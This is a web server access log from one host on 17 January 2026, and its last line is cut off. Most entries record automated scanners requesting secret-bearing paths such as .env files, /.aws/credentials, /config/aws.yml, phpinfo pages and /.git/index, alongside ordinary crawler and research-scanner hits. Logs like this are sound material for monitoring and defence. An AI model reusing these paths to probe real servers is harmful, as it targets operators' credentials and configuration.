+[17/Jan/2026:09:01:21 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" "-" +[17/Jan/2026:09:01:21 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0" "-" +[17/Jan/2026:09:01:21 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36 OPR/33.0.1990.115" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; H30-U10 Build/HuaweiH30-U10) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "-" +[17/Jan/2026:09:01:22 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; SGH-T399N Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.135 Mobile Safari/537.36" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/docs/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; BRI/2; EIE10;ENUSWOL)" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/old/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; LG-M153 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/.env.local" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/7.1.4 Safari/537.85.13" "-" +[17/Jan/2026:09:01:22 +0000] 404 - GET http 92.249.249.197 "/cms/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0" "-" +[17/Jan/2026:09:01:23 +0000] 400 - GET http 92.249.249.197 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:09:01:23 +0000] 404 - GET http 92.249.249.197 "/new/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36" "-" +[17/Jan/2026:09:01:23 +0000] 404 - GET http 92.249.249.197 "/frontend/web/debug/default/view" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 FirePHP/0.1.1.2" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/_static/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MASPJS; rv:11.0) like Gecko" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/download/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; he-il; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/saas/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; es-es; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/.env.json" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Android; Opera Mini/20.0.2254/37.9072; U; en) Presto/2.12.423 Version/12.16" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/infos/" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Linux armv7l; Opera TV Store/5581) Presto/2.12.362 Version/12.11" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/apps/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/templates/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47" "-" +[17/Jan/2026:09:01:24 +0000] 404 - GET http 92.249.249.197 "/system/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; fi-FI; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/stag/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 6.01 [en]" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/public_html/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en_US) AppleWebKit/522.7 (KHTML, like Gecko) Dreamweaver/10.0.0.4117 Version/3.0 Safari/522.7" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/.env.development" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/portal/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; LGMP450 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/project/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MDDCJS)" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/.aws/credentials" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/app/config/parameters.yml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Coast/2.0.3.70182 Mobile/11B554a Safari/7534.48.3" "-" +[17/Jan/2026:09:01:25 +0000] 404 - GET http 92.249.249.197 "/exapi/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; BRAVIA 4K 2015 Build/LMY48E.S243) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36 OPR/28.0.1754.0 OMI/4.4.22.20.E102586-1.136" "-" +[17/Jan/2026:09:01:50 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:09:08:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:09:09:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:09:17:22 +0000] 400 - - http localhost "-" [Client 135.237.127.94] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:09:25:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:09:27:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:09:30:07 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[17/Jan/2026:09:39:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 176.65.148.95] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:09:40:48 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:09:48:02 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[17/Jan/2026:09:49:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 94.21.1.50] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:09:50:31 +0000] 400 - - http localhost "-" [Client 87.251.75.163] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:09:53:23 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:10:02:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 147.185.132.184] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[17/Jan/2026:10:03:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 78.20.40.196] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[17/Jan/2026:10:06:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:10:15:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.169.105.105] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:10:18:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:10:19:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[17/Jan/2026:10:32:54 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:10:37:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 100.48.212.15] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[17/Jan/2026:10:37:42 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:10:37:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 3.214.174.148] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[17/Jan/2026:10:40:54 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.2.1; en-us; SCH-I500 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[17/Jan/2026:10:40:54 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; NP08; NP08; MAAU)" "-" +[17/Jan/2026:10:40:54 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "-" +[17/Jan/2026:10:40:54 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "-" +[17/Jan/2026:10:40:55 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5" "-" +[17/Jan/2026:10:40:55 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C5060d Safari/601.1" "-" +[17/Jan/2026:10:40:55 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.179] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 4.2.2; GT-I9505 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.59 Mobile Safari/537.36" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/getcfg.php" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; SpringBoard Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/cp/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/ads/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; SM-T310 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/config/aws.yml" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SGH-T769 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/staticfiles/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/opt/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.3; en-us; SCH-I545 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/Api/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8" "-" +[17/Jan/2026:10:40:56 +0000] 404 - GET http 92.249.249.197 "/App/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9b2) Gecko/2007121120 Firefox/3.0b2" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/psnlink/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/ftpmaster/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/error/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/div/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/theme/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.2.2; Nexus 7 Build/JDQ39) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/well-known/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 SeaMonkey/2.35" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/old.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/environments/local/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F51a Safari/601.1" "-" +[17/Jan/2026:10:40:57 +0000] 404 - GET http 92.249.249.197 "/environments/production/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/scripts/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/styles/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.9a1) Gecko/20100202 Firefox/3.0.18" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/inc/.env" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; HUAWEI Y600-U20 Build/HUAWEIY600-U20) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/.env_bak" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/.env-sample" [Client 78.153.140.179] [Length 150] [Gzip -] "Opera/8.52 (Windows NT 5.1; U; en)" "-" +[17/Jan/2026:10:40:58 +0000] 404 - GET http 92.249.249.197 "/fastlane/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898" "-" +[17/Jan/2026:10:43:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:10:48:46 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.231.89.43] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:10:48:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 91.231.89.190] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[17/Jan/2026:10:51:29 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:11:01:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:11:01:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:11:08:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:11:33:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:11:35:19 +0000] 400 - - http localhost "-" [Client 176.65.148.95] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:38:52 +0000] 404 - GET http 92.249.249.197 "/.git/index" [Client 77.83.39.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A3010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" +[17/Jan/2026:11:39:26 +0000] 400 - GET http 92.249.249.197 "/" [Client 74.235.120.62] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:11:39:26 +0000] 400 - - http localhost "-" [Client 74.235.120.62] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:39:30 +0000] 404 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[17/Jan/2026:11:39:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:11:39:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:40:16 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:42:59 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:44:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:45:44 +0000] 404 - GET http 92.249.249.197 "/druid/index.html" [Client 20.65.219.43] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[17/Jan/2026:11:46:06 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.190] [Length 122] [Gzip 1.35] "Mozilla/5.0 (OS/2; Warp 4.5; rv:38.0) Gecko/20100101 Firefox/38.0" "-" +[17/Jan/2026:11:53:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:11:54:59 +0000] 400 - GET http 92.249.249.197 "/" [Client 66.132.153.118] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:11:55:00 +0000] 400 - - http localhost "-" [Client 66.132.153.118] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:11:55:38 +0000] 400 - GET http 92.249.249.197 "/robots.txt" [Client 66.132.153.118] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[17/Jan/2026:11:57:07 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:12:00:42 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:02:04 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:18:38 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:19:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:12:21:34 +0000] 404 - POST http 92.249.249.197 "/api" [Client 195.3.222.78] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[17/Jan/2026:12:23:27 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:12:27:48 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:12:32:47 +0000] 404 - GET http 92.249.249.197 